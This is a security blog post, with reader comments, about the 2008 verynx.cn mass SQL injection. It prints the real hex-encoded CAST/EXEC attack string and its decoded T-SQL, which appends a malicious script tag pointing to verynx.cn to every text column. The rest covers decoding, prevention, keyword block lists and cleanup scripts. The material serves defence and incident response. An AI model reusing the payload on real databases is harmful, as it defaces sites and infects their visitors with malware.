
SQL Injection Hack using CAST from 1.verynx.cn

Update

If the attack has changed to a different URL simply replace the URL in the solution script below. That is assuming the rest of the syntax has not changed.

Hope that helps


A new SQL injection attack appears to be in the wild from verynx.cn. It hides its payload in a hex-encoded string that is CAST to a CHAR(4000) variable and then executed; the payload appends HTML garbage, including a reference to a JavaScript file on the verynx.cn domain, to your data, and that script infects users when they visit your website. Luckily the host serving the offending JavaScript file now points to 127.0.0.1, which will help stop the spread of the virus. Unfortunately the botnet still seems to be spamming websites with the scripted attack, leaving many entirely broken or loading extremely slowly, as each page might make hundreds of requests to the payload.

The attack below works like this:

You have a web page like www.mywebsite.com/showproducts.aspx?categoryId=12. An attacker visits your website with SQL code appended to the number 12 in that URL. A simple attack would look like www.mywebsite.com/showproducts.aspx?categoryId=12;SELECT * from tblProducts;. As you can see, the attacker is guessing at the table name and hoping to get all of its contents dumped back to them when you pass the categoryId straight through to the database. Below you can see a much more complicated attack where the whole payload is hex-encoded, CAST to CHAR(4000) and handed to EXEC, so your SQL Server decodes and runs it while the keywords of the real payload (the cursor, the UPDATE and the script tag) never appear in readable form in the URL.

Sample of Attack:

;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Un-Obfuscated Attack:

;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://1.verynx.cn/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
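To see what a request in the form of the sample above actually does, a defender can URL-decode the query string, pull the hex out of the CAST(0x... AS CHAR(4000)) expression and decode it; the script URL it yields is the exact string to hunt for (and replace) in the database. This is an added example, not the original author's code: the request it parses is constructed with a shortened payload, and the function names are mine.

```python
"""Decode the CAST(0x...) payload of a logged request and pull out indicators.

Added example for this page, not the original author's code. It parses the
attack format shown above (a hex string CAST to CHAR(4000), then EXEC); the
request below is constructed with a shortened payload, and the function names
are mine.
"""
import re
from typing import Optional
from urllib.parse import unquote

# CAST(0x<hex> AS CHAR(4000)) as it appears once the query string is URL-decoded.
CAST_HEX_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
# Things the decoded T-SQL of this attack contains; any one of them is a red flag.
PAYLOAD_MARKERS = ("DECLARE", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "<SCRIPT")
# src="..." inside the injected HTML: the part that changed between attack waves.
SCRIPT_SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def decode_cast_payload(query_string: str) -> Optional[str]:
    """Return the T-SQL hidden in a CAST(0x...) expression, or None if there is none."""
    m = CAST_HEX_RE.search(unquote(query_string))
    if not m:
        return None
    hex_blob = m.group(1)
    if len(hex_blob) % 2:  # odd length: the log line was truncated mid-byte
        hex_blob = hex_blob[:-1]
    # The payload is plain ASCII T-SQL; latin-1 never fails on a stray byte.
    return bytes.fromhex(hex_blob).decode("latin-1")


def analyse_request(query_string: str) -> dict:
    """Decode the payload and report the indicators a defender wants to act on."""
    payload = decode_cast_payload(query_string)
    if payload is None:
        return {"suspicious": False, "payload": None, "markers": [], "script_urls": []}
    upper = payload.upper()
    markers = [k for k in PAYLOAD_MARKERS if k in upper]
    urls = SCRIPT_SRC_RE.findall(payload)
    return {"suspicious": bool(markers), "payload": payload,
            "markers": markers, "script_urls": urls}


# Constructed sample: the shape of the logged request with a shortened hex
# payload that decodes to: DECLARE @T varchar(255),<script src="http://1.verynx.cn/w.js">
SAMPLE_QUERY = (
    "categoryId=12;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    "4445434C415245204054207661726368617228323535292C"
    "3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E"
    "%20AS%20CHAR(4000));EXEC(@S);"
)

if __name__ == "__main__":
    report = analyse_request(SAMPLE_QUERY)
    print(report["payload"])
    print("indicators:", report["markers"], report["script_urls"])
```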

Tips to prevent SQL Injection Hacks:

Do not trust user data. The easiest way to resolve most SQL injection issues is to validate all incoming data. For any kind of number or ID this is straightforward: make sure the incoming value converts cleanly to a number (an int, for example), and likewise make sure other IDs such as GUIDs convert cleanly to GUIDs before passing anything to your database.

Another simple fix: if you don't need EXECUTE, make sure the account your application uses to connect to the database doesn't have execute permissions.
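As an added example that is not part of the original post, here is the categoryId lookup from the article written both ways: the vulnerable version pastes the query-string value into the SQL text, the hardened one requires the value to convert to an integer (or a GUID, for GUID keys) and binds it as a parameter. It uses an in-memory SQLite table with constructed rows in place of SQL Server, and executescript() to mimic a driver that runs stacked statements.

```python
"""Untrusted categoryId: string concatenation versus validation plus parameters.

Added example for this page, not the original author's code. It reproduces the
showproducts.aspx?categoryId=12 scenario from the article on an in-memory
SQLite table with constructed rows; executescript() stands in for a driver that,
like the SQL Server one hit by this attack, runs every ';'-separated statement.
"""
import sqlite3
import uuid
from typing import List, Union

# The string this attack appended to every varchar column (taken from the page).
INJECTED = '"></title><script src="http://1.verynx.cn/w.js"></script><!--'

# Constructed stand-in for the attacker's stacked statement, written in SQLite
# syntax (|| concatenates strings); the real one was the T-SQL cursor above.
TAMPERED_ID = "12;UPDATE tblProducts SET name = name || '" + INJECTED + "'"


def make_db() -> sqlite3.Connection:
    """Constructed product table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblProducts (id INTEGER, categoryId INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO tblProducts VALUES (?, ?, ?)",
        [(1, 12, "Widget"), (2, 12, "Gadget"), (3, 7, "Sprocket")],
    )
    conn.commit()
    return conn


def product_names(conn: sqlite3.Connection) -> List[str]:
    """Every product name in id order; used to inspect the table after a request."""
    return [row[0] for row in conn.execute("SELECT name FROM tblProducts ORDER BY id")]


def handle_request_vulnerable(conn: sqlite3.Connection, category_id: str) -> None:
    """Before: the query-string value is pasted into the SQL text.

    Whatever follows the ';' runs with the application's database rights, which
    is how the DECLARE ... EXEC(@S) payload above got to run on SQL Server.
    """
    sql = "SELECT name FROM tblProducts WHERE categoryId=" + category_id
    conn.executescript(sql)  # every stacked statement executes here


def validate_id(value: str) -> Union[int, uuid.UUID]:
    """Accept only what an ID can be: an integer or a GUID. Anything else is rejected."""
    try:
        return int(value)
    except ValueError:
        pass
    try:
        return uuid.UUID(value)
    except ValueError:
        raise ValueError("invalid id: %r" % value[:40]) from None


def handle_request_hardened(conn: sqlite3.Connection, category_id: str) -> List[str]:
    """After: the value must convert to an int, and it is bound as a parameter."""
    cid = validate_id(category_id)
    if not isinstance(cid, int):
        raise ValueError("categoryId must be an integer")
    rows = conn.execute("SELECT name FROM tblProducts WHERE categoryId=?", (cid,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    handle_request_vulnerable(db, TAMPERED_ID)
    print("after vulnerable handler:", product_names(db))  # every name now carries the script tag
    db = make_db()
    try:
        handle_request_hardened(db, TAMPERED_ID)
    except ValueError as exc:
        print("hardened handler rejected the request:", exc)
    print("hardened handler, id=12:", handle_request_hardened(db, "12"))
```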

Solution (Fixing your database after the attack):

Here we turn their code into the solution: the same cursor loops through every text column of every user table in the database and removes what they inserted. The REPLACE matches the exact injected string, so if the script URL in your data differs (the subdomain changed between waves of the attack), substitute it in the string below.

DECLARE @T varchar(255),@C varchar(4000)
-- Every (table, column) pair for text-like columns (text, ntext, nvarchar, varchar) in user tables
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- Strip the injected tag from the current column; the doubled quotes are the literal inside the dynamic SQL
exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Additional Links:

All the details you need to understand SQL Injection: http://en.wikipedia.org

SQL Injection Cheat Sheet: http://ferruh.mavituna.com

SQL Injection Attack Detection Tools: http://52coding.com

Essential Security Considerations: http://nettuts.com

PHP+Mysql tips for preventing SQL injections: http://www.johnrockefeller.net

What to do if you’re still stuck:

Post your questions in the comments below and we will answer them as quickly as possible – also if anyone has any useful information we will update the article to share that information with others.


73 Responses to “SQL Injection Hack using CAST from 1.verynx.cn”

  1. Marc Lieberman Says:

    Our website was hit with this injection attack yesterday. Before the verynx.cn domain was shut down, what would happen to a user who visited our website, in case we start getting calls from people wondering if they received a virus or wondering if their credit card information is safe?

    Also, this attack seems to have targeted ColdFusion sites specifically, and the first recommendation I found was to make sure you are using . I’m surprised this wasn’t mentioned under how to prevent SQL injection hacks.

  2. devit Says:

    From our digging the domain verynx.cn isn’t actually down, but the offending sub domain 1.verynx.cn is down – and as far as we are aware it was down all day yesterday.

    We did however manage to dig up at least a portion of the payload. If for some reason users had hit the infected website while the payload was available it would have installed a virus on their computer.

    We’ll leave out the details of how the payload was loaded onto the user’s computer as there’s no need to spread that type of information.

    Marc, it looks like your sentence about “the first recommendation I found was…” is missing the last word? We’re assuming you’re going to suggest a cold fusion specific function to clean the input?

    Please clarify and we will gladly update the article.

    Thanks

  3. devit Says:

    Thanks Marc – We believe you’re correct – This attack appears to be directly targeted at coldfusion.

    We believe the command you left out above was the cfqueryparams function.

    Thanks for the tip,
    Devit

  4. IH8IT Says:

    For the less versed among us, can someone expand on the statement above as to how to “ensure the user connecting to your database doesn’t have execute permissions.”? How can I tell “which user is connecting to my database”? And, “doesn’t have execute permissions” where? In SQL, IIS, Coldfusion?…

  5. Marc Funaro Says:

    For those running IIS, a quick fix for the current attack vector is to install ISAPI_Rewrite (http://www.helicontech.com — get the latest version for free, applies rules to all websites on the server), and create a regex rule that kills the request based on the known format of the attack. For example, the attack string contains “char(4000)” or “CHAR%284000%28″ in the query string… so my config file for ISAPI_Rewrite looks like this:

    # Helicon ISAPI_Rewrite configuration file
    # Version 3.0.0.25

    RewriteEngine on
    RewriteCond %{QUERY_STRING} .*char\(4000\).* [NC]
    RewriteRule . - [F]
    RewriteCond %{QUERY_STRING} .*CHAR%284000%28.* [NC]
    RewriteRule . - [F]

    Stops the attack cold, before your application server even tries to execute.

    Of course, this is a band-aid approach; one change to the attack string, and you’re vulnerable yet again. Proper user data validation and use of CFQUERYPARAM are the real answers… but for those that have to support older apps, or have a ton of code to go through, this can at least put a stop to the current threat… and it gives you a quick server-wide solution for stopping similar threats you may face while you fix your code. :)

    Apache users can obviously use mod_rewrite to accomplish the same goal.

    HTH

  6. Mike Says:

    We were hit by these guys back in May on a classic ASP site. I think there might be more to how they went about the deed, because I am guessing that they started by running a query to list all table names. At least, I think that’s how they figured out the syntax for the actual injection.

  7. Al Says:

    Hi there. Thanks for the info on this. We’ve been hit with this repeatedly over the last 4 days. We’re scratching our heads as to how it’s getting in. We found one likely place, and closed that door, but it was back within 24 hours. We’re searching for more leaks in our coding… We are on a Cold Fusion platform also.

    One thing we did was build a little function looking for the following terms in user entry:

    declare
    execute
    select
    varchar

    We are logging those source IPs to a table and throwing CFABORT immediately for any subsequent traffic. Not really helpful. We collected over 10,000 unique IP addresses in 24 hours, and were attacked again.

    Our symptoms have been the same as mentioned here. This little attack appends a javascript to the end of just about every field in every table (varchars). The js in our database today was pointed at http://abc.verynx.cn/w.js – but it’s been a different subdomain each time.

  8. James Says:

    This code worked excellent – it stripped all records of 1.verynx
    HOWEVER as of 16:37 pm 23 July (got hit earlier with 1.verynx) – it’s hit again, this time using abc.verynx.cn – I tried amending the above script to find abc.verynx instead but it won’t work :( am I missing something?

  9. IH8IT Says:

    OK, this is getting ridiculous. I have been hit with this 3 times, twice today alone. The latest redirect is to “abc.verynx.cn”.

  10. Frank W Says:

    Hi,

    If someone had been to a site that’s infected by the 1.verynx.cn (virus?) would a commercial virus program be able to detect it and remove it? Like Norton, ZoneAlarm, Kaspersky, etc…? And yes I’ve watched the DNS go from 127.0.0.1 to other values that work! It’s still out there and going on! Patch your sites!

    Thanks,
    Frank

  11. Pedro Claudio Says:

    Hi, devit To prevent a coldfusion http://pcsilva.blogspot.com/2008/07/sql-injection.html .

    For other languages can transcribe, of course remember to add the name of the friend.

  12. Karen Says:

    Earlier today I experienced this injection and repaired it. Then it occurred again, this time the sub domain in the code changed to abc.verynx.cn. Is this one down as well? I have repaired it again (thanks to the tip above which eliminated the need to restore a backup) but I obviously need to get to work on my CF scripts to prevent this. Not even sure where to start..

  13. Robert Says:

    I have done some digging around on this subject since my server was attacked yesterday and found:

    1.verynx.cn points to 127.0.0.1 and is blocked by Firefox (at least version 3) but not Internet Explorer.

    Following CF at the top of your application.cfm page is quite efficient against any kind of injection attacks (at least as far as I now know):

    I may have been a little overcautious with maybe too long a list, but I’d rather be safe than sorry. If anyone has a better idea??

    I used HP Scrawlr 1.0 to scan my site for vulnerabilities and found that cfqueryparam alone isn’t enough.

  14. Sharona Says:

    We just had an attack on our server today. It wasn’t a coldfusion one, it was an MSSql Server one. I was just wondering how these guys get into the db and update EVERY field??!!

    I created a script to remove it. hopefully this might help somebody out there with removing the code that was inserted into their db:

    update TABLENAME
    set FIELDNAME = replace(FIELDNAME,’”>

  15. MichelV Says:

    I did get this from other IPs starting 24 July. Looks like it is moving. IPs from USA and Canada, I am currently counting up to 4 different ones.

  16. Luis Melo Says:

    Our system was not SQL Injection proof and we recently suffered an attack that corrupted the data in some of our database tables. The attack was quite elegant and fortunately did not cause severe damage other than the appending of a SCRIPT string to a bunch of VARCHAR fields. This was meant to actually execute a JS file and this qualifies as a XSS attack.
    In researching the Web for a solution for the problem, and a way to immunize our CF application against further attacks, we came across the CFQUERYPARAM solution, but our application has over 5000 files, each with one or more Queries and Stored Procedure calls. Implementing such a solution in such an extensive amount of files was impossible in a timely fashion, so I looked for another solution and came across a ColdFusion written function (isSqlInjection) that showed some promise but some shortcomings as well.
    I wanted something that we could deploy fast and that would immunize the entire application in one single swoop.
    As far as I understand, SQL injections can come from either FORM fields or from URL passed variables. Therefore we developed a function that was placed in our application.cfm and therefore used by all our CFM files. The function used a custom developed Regular Expression to check all URL and FORM fields for possible SQL Injections.
    We were able to develop this in one day and implement it immediately. That same night we were able to catch and prevent 2 more SQL Injection attempts.
    We have since improved the script and it now does the following:
    • Checks all FORM and URL input for SQL injection code
    • Interfaces (CFHTTP) with ARIN WHOIS Database Search (http://ws.arin.net/whois/) to get ISP information for the offender’s IP.
    • Automatically sends an abuse report to the ISP concerning the attack.
    • Displays a message informing the hacker that the attack was logged, that his/her ISP was contacted and that he/she is breaking the law
    • Sends us an email with the SQL Injection string, IP address and other information.
    • Stores the hacker’s IP address in an APPLICATION array (Black List).
    o Each time a page in our application is requested, the IP address (CGI.REMOTE_ADDR) is compared with those in the Black List and if it is present, page execution is halted right at the application.cfm level returning a blank page to the browser
    o Black List entries that are older than one hour are cleared by a scheduled task on an hourly basis.
    We are making this code available to other CF developers for free. Please request a copy by email. luism@grouptraveltech.com.
    If after receiving it you have suggestions or improvements, please send them my way as well.

  17. Ben Says:

    The company I contract for was hit with this. It appended the script to every varchar/text field. Thanks for a look at the unobfuscated code. I got here searching on 1.verynx.cn/w.js and so to others who do the same:

    as mentioned above, cfqueryparam is good for escaping all data, ie:
    <cfqueryparam value="#FORM.first_name#" cfsqltype="CF_SQL_VARCHAR">
    <cfqueryparam value="#URL.id#" cfsqltype="CF_SQL_INTEGER">

    Our (naive) mistake was in believing that only input/form data was vulnerable – and not dynamic urls that pull simple select statements.

    Other solutions might involve creating a read-only db user for any read only areas, scanning the db at intervals for script/object/iframe etc.

    I also found a script that runs through and examines all your queries to make sure they’re parameterized which we found useful:
    http://www.cfprimer.com/downloads.cfm

    My php/mysql sites were also hit (but failed, fortunately) – while the above targets SQL Server, I read somewhere else that there’s a working MySQL version of this.

    I believe the js installed a zombie virus, to be called upon to propagate the attack. Tracing the IPs where we were getting hit from, many were from cable connections in the states. Very sci fi.

  18. tieguy Says:

    Help Please
    I have seen this in my log files
    called ipower and linked them this site still no help
    have a look at the latest logs
    started last night

    Then today ::

    59.6.82.62 - - [24/Jul/2008:07:59:25 -0400] "GET / HTTP/1.1" 403 825 "-" "Microsoft URL Control - 6.00.8169"
    208.80.193.40 - - [24/Jul/2008:08:00:13 -0400] "GET / HTTP/1.0" 200 36899 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR Enabled; SIMBAR={CF07971C-C698-451d-BAB9-18491326916A}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; Media Center PC 2.8; MEGAUPLOAD 1.0)"
    208.80.193.36 - - [24/Jul/2008:13:02:02 -0400] "GET / HTTP/1.0" 200 36899 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft; ZangoToolbar 4.8.2)"

    WTF is this?

  19. tieguy Says:

    thank you

  20. Jonathan Says:

    Our site has been hit multiple times with this as well. Thanks for posting the solution for cleaning up the mess. I’ve spent countless hours on this over the past few days.

  21. Mark Says:

    Here’s some pretty simple injection protection code that I implemented in my application.cfm file. It’s been effective so far in blocking further hacking attempts, and since it emails me the details on the perp, I can block the IP and notify the ISP.

    SQL INJECTION PROTECTOR CODE (stored in /application.cfm)

    ========================================================

    HACK ATTEMPT RECORDED FROM IP: #remote_addr#

    #DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#

    #script_name#&#query_string#

    HACK ATTEMPT RECORDED:

    #DateFormat(Now(), “MM-DD-YYYY”)# @ #TimeFormat(Now(), “HH:MM:SS”)#

    IP: #remote_addr#

    ATTEMPT:

    http://#server_name#/#script_name#&#query_string#

  22. Mark Says:

    SQL INJECTION PROTECTOR CODE (stored in /application.cfm)
    ========================================================

    <cfparam name="query_string" default="">

    <cfif query_string contains "SELECT" or query_string contains "EXECUTE" or query_string contains "DECLARE" or query_string contains "VARCHAR" or query_string contains "CONVERT">
    <cfoutput>
    <pre>
    <h1>HACK ATTEMPT RECORDED FROM IP: #remote_addr#</h1>
    #DateFormat(Now(), "MM-DD-YYYY")# @ #TimeFormat(Now(), "HH:MM:SS")#
    #script_name#&#query_string#
    </pre>
    </cfoutput>
    <cfmail to="mark@warrick.net" from="webmaster@zapconnect.com" subject="HACK ATTEMPT FROM IP: #remote_addr#">
    HACK ATTEMPT RECORDED:
    #DateFormat(Now(), "MM-DD-YYYY")# @ #TimeFormat(Now(), "HH:MM:SS")#
    IP: #remote_addr#
    ATTEMPT:
    http://#server_name#/#script_name#&#query_string#
    </cfmail>
    <cfabort>
    </cfif>

    ========================================================

  23. Radek Says:

    Using CFIF is only a small security against the hack; it will only filter those KEYWORDS, somebody can come up with other code and you’re done. What I suggest is, if you’re not using EXECUTE, remove it from permissions in the DB, and the most important thing is using cfqueryparams:

    select name from product where productoid=

    select name from product where variable=

    For more security ADD MAXLENGTH:

    select name from product where productoid=

    select name from product where variable=

    I know it is time consuming to check all your queries, but here is a great tool to check them and easily fix them and you’re secured forever!!!!

    http://qpscanner.riaforge.org/

    Very great tool!

  24. Radek Says:

    The blog is cutting the queries, don’t know why:

    “select name from product where productoid=”

    “select name from product where variable=”

    For more security ADD MAXLENGTH:

    “select name from product where productoid=”

    “select name from product where variable=”

  25. John Bell Says:

    I recently recovered from the abc.verynx.com strain. I found the above scripts did not completely clear up my issues. Every database’s INFORMATION_SCHEMA.COLUMNS table was injected in the DATA_TYPE column. I used a simple find and replace script on that particular field to remove the code from the DATA_TYPE field. Perhaps the above removal script can be modified to check this table as well.

    John Bell

  26. Mark Says:

    Our server was hit by the SQL injection. Working at an edu, our security person refuses to reattach SQL Server or the webserver, so I cannot scrub the data. The network guys have reloaded the webserver OS and applied the patches…
    In a SQL Server class I took, one guy was suggesting going into SQL Server and, for the account the webserver is using to attach to the database, revoking SELECT access on the view sys.sysobjects for that user. I have yet to find information that substantiates that methodology…
    ps AGHHH

  27. Scott Says:

    We also had a ColdFusion site that was hit with this attack. We got the database cleaned up and used CFQUERYPARAM to stop the attacks. However, I have since noticed reduced performance from the SQL Server. There is also an unexplained increase in the database size. Some of the tables are quite large. I’m guessing that temporarily adding content to the database affected the indexes etc. Does anyone have any ideas as to how to return the database to its former level of efficiency?

  28. Jason Leveille Says:

    Thanks for posting this. We have been wrestling with this attack in a classic asp application, and I think we finally have it under control (by finding and filtering all entry points). We’ll now be taking a look at execute permissions.

  29. Jason Leveille Says:

    Thank you again for this post. At this point we are wondering if steps need to be taken to help our users recover from this attack. As you state, if a user loaded the payload while the server was online a virus would have been installed on their machine. Is there additional information you can provide about the virus? Is there anywhere we can go to learn more information about the virus? You obviously were able to follow the attack to a point where you were able to learn that a virus would be installed. Any insight you could provide would be very helpful.

  30. Nik Says:

    Thanks for the hints about how to remove the threat, we found Ben’s suggestion to download the file from http://www.cfprimer.com/downloads.cfm extremely valuable!

  31. Dr. G. Says:

    my site has been overrun by: “http://abc.verynx.cn/w.js”.

    My webmaster/host-securenet systems says that the hits have not come from his side but from outside and is my responsibility. Now he wants 2,000.00 to fix with all new codes,etc.

    What shall I do?

  32. devit Says:

    re: Jason Leveille

    We believe the virus was a worm. It looks like it could be one of the following:
    http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FPOPWIN%2ECK&VSect=P
    http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FNSPAK%2EAB&VSect=P
    http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FAUTORUN%2ETD&VSect=P
    http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FSILLY%2EGF&VSect=P

    We think a full virus scan would detect anything it may have loaded. We’ve found that if a machine is infected, using an online virus scanner such as http://housecall.trendmicro.com can be useful.

    Hope that helps.

  33. devit Says:

    re: Dr. G.

    Depending when your webmaster created the code you may be able to push back and get at least some of the cost removed. It’s obviously very hard to give any type of advice with such little information so we won’t even try. What we can comment on is generally there is a warranty period for code. Also you may want to research alternatives such as competitors or try and hold the person who wrote the code accountable for the security problem.

    Good Luck.

  34. Mark Says:

    this has been perhaps proposed as well but here is another method at the database level revoking SELECT access of system level views (within SQL Server)
    http://dileepstanley.wordpress.com/2008/06/23/prevent-some-of-the-sql-injection-possiblities/
    • at the code level we have implemented a sniffer script that looks for common methods (DML functions: SELECT INSERT UPDATE DELETE DROP etc)of attack via FORM and URL variables –
    at the server IIS level i have blocked the IPs of sites noted to have possibly propagated injection attacks; while this seems like I am shooting rubber bands at stars [it seems many reference servers in .cn] example of the embedded attack –> script src=”w.js” /script script src=”abc.verynx.cn/w.js” /script * From Microsoft website “Stop SQL Injection Attacks Before They Stop You” http://msdn.microsoft.com/en-us/magazine/cc163917.aspx

  35. » A SQL Injection attack and search engines | SQL Server Feeds Says:

    [...] Injection attack came up. Here’s a post describing it; it also includes other useful links: http://www.rtraction.com/blog/devit/sql-injection-hack-using-cast.html A search for the query string “http://1.verynx.cn/w.js” (the quotes are part of the [...]

  36. Jesse Monson Says:

    -- Try this out if you've been hacked. Run this SQL statement in Query Analyzer. Put the garbage you are trying to remove in the @Offending_String variable

    DECLARE @Offending_String varchar(4000)
    DECLARE @T varchar(255),@C varchar(4000)

    -- Put the string you want cleared in here
    SET @Offending_String = ''

    DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name
    from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

    OPEN Table_Cursor

    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
    -- The string has to be quoted inside the dynamic SQL, with any single quotes in it doubled
    EXEC('UPDATE ['+@T+'] SET ['+@C+'] = REPLACE(['+@C+'],'''+REPLACE(@Offending_String,'''','''''')+''','''')')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

  37. Troy Says:

    We had the same problem and saw this posting:

    http://coldfusion.sys-con.com/node/620373

    =============================================================================
    If you’re using ColdFusion, to harden your website from sql injection attacks add the following code to your Application.cfm file. If you’re not using ColdFusion, you can translate this code into the language you’re using and it should still work.

    This code would reside in your Application.cfm file which gets executed every time a ColdFusion file is requested on the server. What it does is it checks all form and URL variables to see if they contain any patterns matching an SQL SELECT, UPDATE, INSERT, DELETE or DROP statement.

    If a match is found, the user is redirected to a message page indicating that a possible SQL Injection attack was made and the SQL injection is prevented.

    =============================================================================

    I hope this will help.

  38. SQL injection using cast / declare attack | Debt Prison Says:

    [...] which, so far, seems specific for servers with coldfusion. However, according to a visitor to this article the attack had evolved, affecting MSSQL. Here’s a sample of the attack string [...]

  39. T.Edge Says:

    I found that filtering all special characters in the query string, like any of the following chars: ( ) : ; ‘ as well as the words select, delete, drop, insert does a good job at sql injection attacks. I get an email like the above (22) comment, plus the user gets re-routed to a “blocked.html” page. I will probably add the words declare, cast, char, and exec if it doesn’t interfere with the normal operation of my site. My IP blocker code doesn’t work with all of these different IP’s though, so I’m hoping they will just give up soon. So far, I’ve been getting slammed for about 6 hours.

  40. EVH Says:

    Thanks for the post – sounds like a lot of people have been getting slammed by these bots recently so the info here is very helpful.

    One of our ColdFusion sites got hit this week by a SQL injection, but fortunately we were able to restore most of the damaged data from a backup. It was a very large app that was insourced from a former contractor and contained literally thousands of queries with parameters that were all missing cfqueryparam. Although we made efforts to use find/replace to update the code and many previous attacks were trapped, there were unfortunately a few odd places that were missed and one of these was the likely point of entry.

    In addition to adding cfqueryparam in remaining templates we implemented a custom tag across the whole site that detects the presence of certain SQL keywords in the query string and immediately aborts the request if a match is found. This is a bit kludgy and far from bulletproof, but it at least provides an additional layer of defense and prevents any data from being served or error logging/notification email to occur.

  41. loucas Says:

    another band aid for those who have loads of old cf apps to look after

    http://coldfusion.sys-con.com/node/620373

    L

  42. Fred Says:

    Does anyone have more details on the virus? I’ve fixed the vulnerabilities, but I know I’m going to get asked what happened before the site was cleaned up.

  43. S Khosro Says:

    Thank you Mark. I used your code in Application.cfm and it is now aborting all attempts. I also added logic to log the IP into a table so that if they try to use another query from the same IP it's aborted as well. Here is the code snippet.

    select ip from hacktable where ip ='#trim(remote_addr)#'

    HACK ATTEMPT RECORDED FROM IP: #remote_addr#
    #DateFormat(Now(), "MM-DD-YYYY")# @ #TimeFormat(Now(), "HH:MM:SS")#
    #script_name#&#query_string#

    insert hacktable (timelogged,siteid,ip) values('#DateFormat(Now(),"MM/DD/YYYY")# #TimeFormat(Now(), "HH:MM:SS")#',2,'#remote_addr#')

  44. chris brickhouse Says:

    This is not just aimed at ColdFusion pages. ASP is especially vulnerable, as is PHP. I just had an ASP.NET page hacked to hell every five minutes. I ran this script to reverse it. This script removes all script tags from every text/varchar field in your database.

    DECLARE @T varchar(255), @C varchar(255);
    DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.xtype = 'u' AND
    (b.xtype = 99 OR      -- ntext
    b.xtype = 35 OR       -- text
    b.xtype = 231 OR      -- nvarchar
    b.xtype = 167);       -- varchar
    OPEN Table_Cursor;
    FETCH NEXT FROM Table_Cursor INTO @T, @C;
    WHILE (@@FETCH_STATUS = 0) BEGIN
    -- Keeps everything before the last "<script" in the column: "tpircs<" is
    -- "<script" reversed and 6 is the length of "script". The tail of this
    -- EXEC string was lost when the blog swallowed the "<" and is reconstructed
    -- here; the WHERE clause is added so rows without a script tag are not
    -- shortened by six characters.
    EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
    convert(varchar(8000), ['+@C+']),
    len(convert(varchar(8000), ['+@C+'])) - 6 -
    patindex(''%tpircs<%'', reverse(convert(varchar(8000), ['+@C+']))))
    where ['+@C+'] like ''%<script%'''
    );
    FETCH NEXT FROM Table_Cursor INTO @T, @C;
    END;
